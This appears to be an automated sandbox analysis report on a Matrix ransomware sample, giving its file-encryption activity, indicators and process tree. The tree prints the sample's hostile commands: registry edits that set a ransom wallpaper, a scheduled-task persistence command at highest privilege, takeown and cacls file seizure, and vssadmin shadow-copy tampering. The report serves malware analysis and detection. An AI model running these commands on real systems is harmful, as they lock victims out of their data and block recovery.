ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\N: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\L: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\L: UxaXqOSf64.exe File opened (read-only) \??\R: UxaXqOSf64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\AeHtHf61.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle_2x.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\example_icons.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_sv_135x40.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\close.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lt.pak ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\LICENSE ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_18.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\nashorn.jar ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\SearchMeasure.rle ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\appstore.png ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_removeme-default_18.svg ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4684 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4984 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe 4720 UxaXqOSf64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4720 UxaXqOSf64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4720 UxaXqOSf64.exe Token: SeLoadDriverPrivilege 4720 UxaXqOSf64.exe Token: SeBackupPrivilege 5032 vssvc.exe Token: SeRestorePrivilege 5032 vssvc.exe Token: SeAuditPrivilege 5032 vssvc.exe Token: SeTakeOwnershipPrivilege 1332 takeown.exe Token: SeTakeOwnershipPrivilege 4192 takeown.exe Token: SeTakeOwnershipPrivilege 3804 takeown.exe Token: SeTakeOwnershipPrivilege 4604 takeown.exe Token: SeTakeOwnershipPrivilege 200 takeown.exe Token: SeTakeOwnershipPrivilege 4464 takeown.exe Token: SeIncreaseQuotaPrivilege 5072 WMIC.exe Token: SeSecurityPrivilege 5072 WMIC.exe Token: SeTakeOwnershipPrivilege 5072 WMIC.exe Token: SeLoadDriverPrivilege 5072 WMIC.exe Token: SeSystemProfilePrivilege 5072 WMIC.exe Token: SeSystemtimePrivilege 5072 WMIC.exe Token: SeProfSingleProcessPrivilege 5072 WMIC.exe Token: SeIncBasePriorityPrivilege 5072 WMIC.exe Token: SeCreatePagefilePrivilege 5072 WMIC.exe Token: SeBackupPrivilege 5072 WMIC.exe Token: SeRestorePrivilege 5072 WMIC.exe Token: SeShutdownPrivilege 5072 WMIC.exe Token: SeDebugPrivilege 5072 WMIC.exe Token: SeSystemEnvironmentPrivilege 5072 WMIC.exe Token: SeRemoteShutdownPrivilege 5072 WMIC.exe Token: SeUndockPrivilege 5072 WMIC.exe Token: SeManageVolumePrivilege 5072 WMIC.exe Token: 33 5072 WMIC.exe Token: 34 5072 WMIC.exe Token: 35 5072 WMIC.exe Token: 36 5072 WMIC.exe Token: SeTakeOwnershipPrivilege 4764 takeown.exe Token: SeTakeOwnershipPrivilege 4152 takeown.exe Token: SeTakeOwnershipPrivilege 576 takeown.exe Token: SeTakeOwnershipPrivilege 3824 takeown.exe Token: SeTakeOwnershipPrivilege 4856 takeown.exe Token: SeTakeOwnershipPrivilege 3036 takeown.exe Token: SeIncreaseQuotaPrivilege 5072 WMIC.exe Token: SeSecurityPrivilege 5072 WMIC.exe Token: SeTakeOwnershipPrivilege 5072 WMIC.exe Token: SeLoadDriverPrivilege 5072 WMIC.exe Token: SeSystemProfilePrivilege 5072 WMIC.exe Token: SeSystemtimePrivilege 5072 WMIC.exe Token: SeProfSingleProcessPrivilege 5072 WMIC.exe Token: SeIncBasePriorityPrivilege 5072 WMIC.exe Token: SeCreatePagefilePrivilege 5072 WMIC.exe Token: SeBackupPrivilege 5072 WMIC.exe Token: SeRestorePrivilege 5072 WMIC.exe Token: SeShutdownPrivilege 5072 WMIC.exe Token: SeDebugPrivilege 5072 WMIC.exe Token: SeSystemEnvironmentPrivilege 5072 WMIC.exe Token: SeRemoteShutdownPrivilege 5072 WMIC.exe Token: SeUndockPrivilege 5072 WMIC.exe Token: SeManageVolumePrivilege 5072 WMIC.exe Token: 33 5072 WMIC.exe Token: 34 5072 WMIC.exe Token: 35 5072 WMIC.exe Token: 36 5072 WMIC.exe Token: SeTakeOwnershipPrivilege 3808 takeown.exe Token: SeTakeOwnershipPrivilege 4196 takeown.exe Token: SeTakeOwnershipPrivilege 2492 takeown.exe Token: SeTakeOwnershipPrivilege 4968 takeown.exe Token: SeTakeOwnershipPrivilege 3940 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3736 wrote to memory of 2140 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 72 PID 3736 wrote to memory of 2140 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 72 PID 3736 wrote to memory of 2140 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 72 PID 3736 wrote to memory of 1412 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 76 PID 3736 wrote to memory of 1412 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 76 PID 3736 wrote to memory of 1412 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 76 PID 3736 wrote to memory of 4136 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 81 PID 3736 wrote to memory of 4136 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 81 PID 3736 wrote to memory of 4136 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 81 PID 3736 wrote to memory of 4148 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 82 PID 3736 wrote to memory of 4148 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 82 PID 3736 wrote to memory of 4148 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 82 PID 3736 wrote to memory of 4272 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 85 PID 3736 wrote to memory of 4272 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 85 PID 3736 wrote to memory of 4272 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 85 PID 4136 wrote to memory of 4324 4136 cmd.exe 87 PID 4136 wrote to memory of 4324 4136 cmd.exe 87 PID 4136 wrote to memory of 4324 4136 cmd.exe 87 PID 4148 wrote to memory of 4336 4148 cmd.exe 88 PID 4148 wrote to memory of 4336 4148 cmd.exe 88 PID 4148 wrote to memory of 4336 4148 cmd.exe 88 PID 4272 wrote to memory of 4372 4272 cmd.exe 89 PID 4272 wrote to memory of 4372 4272 cmd.exe 89 PID 4272 wrote to memory of 4372 4272 cmd.exe 89 PID 4136 wrote to memory of 4400 4136 cmd.exe 90 PID 4136 wrote to memory of 4400 4136 cmd.exe 90 PID 4136 wrote to memory of 4400 4136 cmd.exe 90 PID 4136 wrote to memory of 4428 4136 cmd.exe 91 PID 4136 wrote to memory of 4428 4136 cmd.exe 91 PID 4136 wrote to memory of 4428 4136 cmd.exe 91 PID 4272 wrote to memory of 4508 4272 cmd.exe 93 PID 4272 wrote to memory of 4508 4272 cmd.exe 93 PID 4272 wrote to memory of 4508 4272 cmd.exe 93 PID 4336 wrote to memory of 4532 4336 wscript.exe 94 PID 4336 wrote to memory of 4532 4336 wscript.exe 94 PID 4336 wrote to memory of 4532 4336 wscript.exe 94 PID 3736 wrote to memory of 4560 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 96 PID 3736 wrote to memory of 4560 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 96 PID 3736 wrote to memory of 4560 3736 ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe 96 PID 4272 wrote to memory of 4620 4272 cmd.exe 98 PID 4272 wrote to memory of 4620 4272 cmd.exe 98 PID 4272 wrote to memory of 4620 4272 cmd.exe 98 PID 4560 wrote to memory of 4640 4560 cmd.exe 99 PID 4560 wrote to memory of 4640 4560 cmd.exe 99 PID 4560 wrote to memory of 4640 4560 cmd.exe 99 PID 4560 wrote to memory of 4668 4560 cmd.exe 101 PID 4560 wrote to memory of 4668 4560 cmd.exe 101 PID 4560 wrote to memory of 4668 4560 cmd.exe 101 PID 4620 wrote to memory of 4652 4620 cmd.exe 100 PID 4620 wrote to memory of 4652 4620 cmd.exe 100 PID 4620 wrote to memory of 4652 4620 cmd.exe 100 PID 4532 wrote to memory of 4684 4532 cmd.exe 102 PID 4532 wrote to memory of 4684 4532 cmd.exe 102 PID 4532 wrote to memory of 4684 4532 cmd.exe 102 PID 4652 wrote to memory of 4720 4652 UxaXqOSf.exe 103 PID 4652 wrote to memory of 4720 4652 UxaXqOSf.exe 103 PID 4560 wrote to memory of 4760 4560 cmd.exe 104 PID 4560 wrote to memory of 4760 4560 cmd.exe 104 PID 4560 wrote to memory of 4760 4560 cmd.exe 104 PID 4760 wrote to memory of 4776 4760 cmd.exe 105 PID 4760 wrote to memory of 4776 4760 cmd.exe 105 PID 4760 wrote to memory of 4776 4760 cmd.exe 105 PID 4560 wrote to memory of 4800 4560 cmd.exe 106 PID 4560 wrote to memory of 4800 4560 cmd.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe"C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe" "C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe"2⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe"C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe" -n2⤵
- Executes dropped EXE
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe"C:\Users\Admin\AppData\Local\Temp\NWmQwMXy.exe" "\\10.10.0.12\C$"3⤵PID:5620
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\AeHtHf61.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\AeHtHf61.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:4324
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4428
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\AYjddmgv.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\AYjddmgv.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lZgqBLCp.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lZgqBLCp.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:4832
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4884
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "classes.jsa" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf64.exeUxaXqOSf.exe -accepteula "classes.jsa" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
-
-
-
